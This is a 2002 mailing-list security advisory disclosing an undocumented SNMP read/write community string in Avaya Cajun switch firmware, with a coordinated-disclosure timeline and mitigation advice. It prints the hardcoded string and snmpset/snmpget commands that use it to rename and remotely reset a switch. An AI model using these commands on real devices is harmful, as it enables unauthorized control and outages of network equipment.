[NEWS] SNMP Vulnerability in Avaya Cajun

From: support@securiteam.com
Date: 08/13/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 13 Aug 2002 15:40:33 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  SNMP Vulnerability in Avaya Cajun
------------------------------------------------------------------------

SUMMARY

There exists an undocumented SNMP r/w community string in firmware for
Avaya Cajun P33x series hardware. This allows anyone having SNMP access to
the device to administer it.

DETAILS

Vulnerable systems:
 * Avaya Cajun P330T software version 3.8.2 and 3.9.1
 * Avaya Cajun P333R software version 3.8.1 and 3.9.1

Additionally firmware for P130, M770-ATM and M770 Supervisor (M-SPX,
M-SPS) were found to be vulnerable.

Details:
Various Cajun firmware contains an undocumented community r/w string
NoGaH$@!
To test try:
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull

sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello
there :)' system.sysName.0 = Hello there :)

sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)

If the above works, you can for example reset a Cajun switch remotely:
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1

Recommendations:
As always it is good administrative practice to block SNMP at the
firewall, especially now after the release of the PROTOS SNMP testing
suite. However, the vulnerability is also present on P333R router
interfaces, which have a higher chance of being exposed to the outside
world:

sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0
system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4

If for some reason the user is unable to upgrade to a fixed version, in
order to mitigate the bug one can restrict SNMP access using the 'set
allowed managers' command, which appeared in recent Cajun firmware.

Vendor status:
Avaya was informed on 27 May 2002. The vendor responded on May 28 2002. As
the vendor proved responsive and worked promptly on the problem, Jacek
Lipkoski and Avaya have agreed to release the information after the
release of fixed software. The fixed software has been released on July 4,
and is available from the Avaya support site <http://support.Avaya.com>
http://support.Avaya.com. Official Avaya security advisories are located
at <http://support.Avaya.com/security/>
http://support.Avaya.com/security/.

ADDITIONAL INFORMATION

The information has been provided by <mailto:sq5bpf@andra.com.pl> Jacek
Lipkowski.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages